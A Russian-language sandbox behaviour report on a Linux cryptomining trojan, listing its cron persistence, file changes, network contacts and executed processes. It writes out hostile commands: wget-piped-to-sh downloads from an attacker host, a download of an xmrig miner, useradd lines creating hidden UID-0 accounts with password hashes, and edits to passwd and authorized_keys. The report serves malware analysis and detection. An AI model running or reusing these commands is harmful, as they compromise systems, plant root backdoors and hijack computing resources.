Техническая информация
Для обеспечения автоматического запуска и распространения:
Создает или модифицирует следующие файлы:
- /etc/cron.hourly/1
- /etc/cron.hourly/.placeholder
- /etc/cron.hourly/0
- /etc/cron.daily/0
- /etc/cron.weekly/0
- /etc/cron.monthly/0
Вредоносные функции:
Получает доступ к ключам SSH
- /root/.ssh/authorized_keys
Запускает процессы:
- sh -c wget http://cf0.pw/0/etc/cron.hourly/0 -O- 2>/dev/null|sh>/dev/null 2>&1
- wget http://cf0.pw/0/etc/cron.hourly/0 -O-
- sh
- sed -i /^[^:]\+:x:0:/{/^root:/!d} /etc/passwd
- sed -i /^$/d /etc/passwd
- sed -i /^$/d /etc/shadow
- useradd -u 0 -g 0 -o -l -d /root -N -M -p $1$f344a097$L.vnLN/nzsnLirq5nMTBg. sudev
- nscd -i passwd
- nscd -i group
- useradd -u 0 -g 0 -o -l -d /root -N -M -p $1$.bHtz1HY$eNtJowby1b0WVTgQT2bLu/ jewbags
- rm -f /etc/cron.hourly/1
- mkdir -p /root
- mkdir -p /root/.ssh
- wget http://cf0.pw/log/ -O /dev/null
- chmod +x /etc/cron.hourly/0
- chmod +x /etc/cron.daily/0
- chmod +x /etc/cron.weekly/0
- chmod +x /etc/cron.monthly/0
- apt-get install wget curl -y
- /usr/bin/dpkg --print-foreign-architectures
- /usr/lib/apt/methods/http
- pkill -9 xmrig
- grep rbdYSfTEtykGg /root/.ssh/authorized_keys
- mkdir -p /usr/libexec
- chmod 755 /root /root/.ssh /root/.ssh/authorized_keys
- chown root:root /root /root/.ssh /root/.ssh/authorized_keys
- rm -f /usr/libexec/x
- wget http://cf0.pw/0/xmr.tgz -O /usr/libexec/x
- ps auxw
- grep -v grep
- grep xmrig
- tar zxvf x
- gzip -d
- cat /dev/urandom
- tr -dc _A-Za-z0-9
- head -c15
- sed s/c285345992f8ae31/hjzv81FMgGl1oQe/ -i config.json
- ./xmrig
- touch /tmp/sdxsdf
- /bin/sh ./xmrig
Пытается завершает следующие процессы:
- killall -9 xmrig
Завершает следующие процессы:
- /usr/lib/apt/methods/http
Выполняет операции с файловой системой:
Модифицирует права доступа к файлам:
- /etc/sedqhitX1
- /etc/sedRTq1ya
- /etc/sednfHV6k
- /etc/passwd+
- /etc/shadow+
- /etc/subuid+
- /etc/subgid+
- /etc/cron.hourly/0
- /etc/cron.daily/0
- /etc/cron.weekly/0
- /etc/cron.monthly/0
- /root
- /root/.ssh
- /root/.ssh/authorized_keys
- /usr/libexec/xmrig-2.4.3/xmrig
- /usr/libexec/xmrig-2.4.3/config.json
- /usr/libexec/xmrig-2.4.3
- /usr/libexec/xmrig-2.4.3/sedcMJzJY
Создает папки:
- /root/.ssh
- /usr/libexec
- /usr/libexec/xmrig-2.4.3
Создает символические ссылки (симлинки):
- /etc/passwd.lock"
- /etc/group.lock"
- /etc/gshadow.lock"
- /etc/subuid.lock"
- /etc/subgid.lock"
- /etc/shadow.lock"
Создает или модифицирует файлы:
- /etc/sedqhitX1
- /etc/sedRTq1ya
- /etc/sednfHV6k
- /etc/.pwd.lock
- /etc/passwd.693
- /etc/group.693
- /etc/gshadow.693
- /etc/subuid.693
- /etc/subgid.693
- /etc/shadow.693
- /etc/passwd-
- /etc/passwd+
- /etc/shadow-
- /etc/shadow+
- /etc/subuid-
- /etc/subuid+
- /etc/subgid-
- /etc/subgid+
- /etc/passwd.698
- /etc/group.698
- /etc/gshadow.698
- /etc/subuid.698
- /etc/subgid.698
- /etc/shadow.698
- /etc/ld.so.preload
- /var/lib/dpkg/lock
- /var/cache/apt/archives/lock
- /usr/libexec/x
- /usr/libexec"/xmrig-2.4.3/xmrig
- /usr/libexec/xmrig-2.4.3/xmrig
- /usr/libexec"/xmrig-2.4.3/config.json
- /usr/libexec/xmrig-2.4.3/config.json
- /usr/libexec/xmrig-2.4.3"/sedcMJzJY
- /usr/libexec/xmrig-2.4.3/sedcMJzJY
- /tmp/sdxsdf
Удаляет файлы:
- /etc/passwd.693"
- /etc/group.693"
- /etc/gshadow.693"
- /etc/subuid.693"
- /etc/subgid.693"
- /etc/shadow.693"
- /etc/shadow.lock"
- /etc/passwd.lock"
- /etc/group.lock"
- /etc/gshadow.lock"
- /etc/subuid.lock"
- /etc/subgid.lock"
- /etc/passwd.698"
- /etc/group.698"
- /etc/gshadow.698"
- /etc/subuid.698"
- /etc/subgid.698"
- /etc/shadow.698"
- /etc/cron.hourly/1"
- /usr/libexec/x"
Сетевая активность:
Устанавливает соединение:
- <LOCAL_DNS_SERVER>
- 21#.##6.149.233:80
- 21#.##1.132.32:80
- 19#.##.242.89:80
- [2#######8:dc41:100::233]:80
- [2#########:1:216:35ff:fe7f:6ceb]:80
- [2#########:0:216:35ff:fe7f:be4f]:80
HTTP GET-запросы:
- cf#.####/etc/cron.hourly/0
- cf#.pw/log/
- se######.######.######ol/updates/main/c/curl/libcurl3_7.38.0-4%2bdeb8u5_i386.deb
- ft#.##.######.#####ebian/pool/main/w/wget/wget_1.16-1%2bdeb8u1_i386.deb
- se######.######.#####ool/updates/main/c/curl/curl_7.38.0-4%2bdeb8u5_i386.deb
- cf#.##/0/xmr.tgz
DNS ASK:
- cf#.pw
- se####ty.debian.org
- ft#.##.debian.org
Прочее:
Собирает информацию о CPU
Собирает информацию об оперативной памяти
Собирает информацию о сетевой активности
